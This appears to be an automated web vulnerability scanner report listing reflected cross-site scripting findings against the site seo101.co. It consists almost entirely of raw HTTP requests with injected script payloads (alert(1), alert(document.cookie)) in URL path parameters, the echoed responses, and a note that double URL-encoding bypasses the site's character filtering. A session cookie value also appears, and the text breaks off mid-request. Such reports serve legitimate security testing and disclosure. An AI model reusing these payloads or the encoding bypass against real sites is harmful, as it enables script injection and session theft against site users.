GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgd8c3f%253balert%25281%2529%252f%252f4367197c4a2/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </imgd8c3f;alert(1)//4367197c4a2/today.png SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b05ed"><script>alert(1)</script>53321847c31 was submitted in the REST URL parameter 3. This input was echoed as b05ed\"><script>alert(1)</script>53321847c31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgb05ed"><script>alert(1)</script>53321847c31/today.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </imgb05ed\"><script>alert(1)</script>53321847c31/today.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 110d3%253balert%25281%2529%252f%252feb8d1b26650 was submitted in the REST URL parameter 4. This input was echoed as 110d3;alert(1)//eb8d1b26650 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png110d3%253balert%25281%2529%252f%252feb8d1b26650 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
</img/today.png110d3;alert(1)//eb8d1b26650 SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec158"><script>alert(1)</script>fffcaaaa68f was submitted in the REST URL parameter 4. This input was echoed as ec158\"><script>alert(1)</script>fffcaaaa68f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.pngec158"><script>alert(1)</script>fffcaaaa68f HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
</img/today.pngec158\"><script>alert(1)</script>fffcaaaa68f seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f69"><script>alert(1)</script>501bf8a42dd was submitted in the REST URL parameter 1. This input was echoed as e5f69\"><script>alert(1)</script>501bf8a42dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Ce5f69"><script>alert(1)</script>501bf8a42dd/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2d49</script><script>alert(1)</script>0cd56afdb20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cc2d49</script><script>alert(1)</script>0cd56afdb20/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload fedf6><script>alert(1)</script>7b52451862d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cfedf6><script>alert(1)</script>7b52451862d/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 7e5f4><script>alert(1)</script>46e7cca4e15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/7e5f4><script>alert(1)</script>46e7cca4e15/img/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</7e5f4><script>alert(1)</script>46e7cca4e15/img/total.png SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8c8d"><script>alert(1)</script>53d4fbe7a9e was submitted in the REST URL parameter 2. This input was echoed as f8c8d\"><script>alert(1)</script>53d4fbe7a9e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cf8c8d"><script>alert(1)</script>53d4fbe7a9e/img/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
<f8c8d\"><script>alert(1)</script>53d4fbe7a9e/img/total.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f3bbe%253balert%25281%2529%252f%252f26b976fe45e was submitted in the REST URL parameter 2. This input was echoed as f3bbe;alert(1)//26b976fe45e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cf3bbe%253balert%25281%2529%252f%252f26b976fe45e/img/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
<f3bbe;alert(1)//26b976fe45e/img/total.png SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e78cd"><script>alert(1)</script>b046ed0c2ea was submitted in the REST URL parameter 3. This input was echoed as e78cd\"><script>alert(1)</script>b046ed0c2ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imge78cd"><script>alert(1)</script>b046ed0c2ea/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
</imge78cd\"><script>alert(1)</script>b046ed0c2ea/total.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bc8c5%253balert%25281%2529%252f%252ff4f7b22376 was submitted in the REST URL parameter 3. This input was echoed as bc8c5;alert(1)//f4f7b22376 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgbc8c5%253balert%25281%2529%252f%252ff4f7b22376/total.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
</imgbc8c5;alert(1)//f4f7b22376/total.png SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b720e%253balert%25281%2529%252f%252fb6ff4140a3d was submitted in the REST URL parameter 4. This input was echoed as b720e;alert(1)//b6ff4140a3d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.pngb720e%253balert%25281%2529%252f%252fb6ff4140a3d HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
</img/total.pngb720e;alert(1)//b6ff4140a3d SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e71f6"><script>alert(1)</script>0777330d80 was submitted in the REST URL parameter 4. This input was echoed as e71f6\"><script>alert(1)</script>0777330d80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.pnge71f6"><script>alert(1)</script>0777330d80 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
</img/total.pnge71f6\"><script>alert(1)</script>0777330d80 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2267"><script>alert(1)</script>30ad2cd3560 was submitted in the REST URL parameter 1. This input was echoed as a2267\"><script>alert(1)</script>30ad2cd3560 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Ca2267"><script>alert(1)</script>30ad2cd3560/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9a15</script><script>alert(1)</script>b591e76bc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Ce9a15</script><script>alert(1)</script>b591e76bc8/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload 7bb35><script>alert(1)</script>d8953906b6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C7bb35><script>alert(1)</script>d8953906b6b/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 13847><script>alert(1)</script>57bbfc96efe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/13847><script>alert(1)</script>57bbfc96efe/img/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</13847><script>alert(1)</script>57bbfc96efe/img/xml-sitemap.jpeg SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65624"><script>alert(1)</script>6457cd1dab2 was submitted in the REST URL parameter 2. This input was echoed as 65624\"><script>alert(1)</script>6457cd1dab2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C65624"><script>alert(1)</script>6457cd1dab2/img/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
<65624\"><script>alert(1)</script>6457cd1dab2/img/xml-sitemap.jpeg seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload be063%253balert%25281%2529%252f%252f1edc52f10f0 was submitted in the REST URL parameter 2. This input was echoed as be063;alert(1)//1edc52f10f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cbe063%253balert%25281%2529%252f%252f1edc52f10f0/img/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
<be063;alert(1)//1edc52f10f0/img/xml-sitemap.jpeg SEO101 Stats and Site Ranking</title>
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2fbf"><script>alert(1)</script>75484e96ae1 was submitted in the REST URL parameter 3. This input was echoed as d2fbf\"><script>alert(1)</script>75484e96ae1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgd2fbf"><script>alert(1)</script>75484e96ae1/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title>
...[SNIP]...
</imgd2fbf\"><script>alert(1)</script>75484e96ae1/xml-sitemap.jpeg seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bfb0f%253balert%25281%2529%252f%252fdf6abbdbd6d was submitted in the REST URL parameter 3. This input was echoed as bfb0f;alert(1)//df6abbdbd6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgbfb0f%253balert%25281%2529%252f%252fdf6abbdbd6d/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
